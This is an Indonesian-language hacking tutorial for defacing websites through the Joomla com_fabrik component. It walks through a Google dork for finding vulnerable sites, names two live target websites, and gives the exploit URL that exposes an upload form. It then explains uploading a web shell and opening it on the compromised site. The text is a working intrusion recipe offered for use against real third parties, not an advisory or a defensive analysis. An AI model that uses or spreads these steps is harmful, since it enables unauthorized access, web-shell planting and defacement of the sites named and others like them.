Deface menggunakan Exploit Com_Fabrik

 CorpseGhost Team


 Deface menggunakan Exploit Com_Fabrik












1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik

 Live Target : http://www.botanylife.org.nz/
                     http://forrajera7leguas.com/

2. Akan ada banyak web, anda buka terserah yang mana

3. Masukkan exploit ini : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini

5. Klik "pilih file" untuk memilih shell, dan klik "Import CSV untuk mengupload

6. Jika berhasil, buka shell anda dengan format www.site.com/media/nama file(txt / html / php)

7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.

Sekian ilmu yang dapat saya berikan.
Selamat mencoba ^_^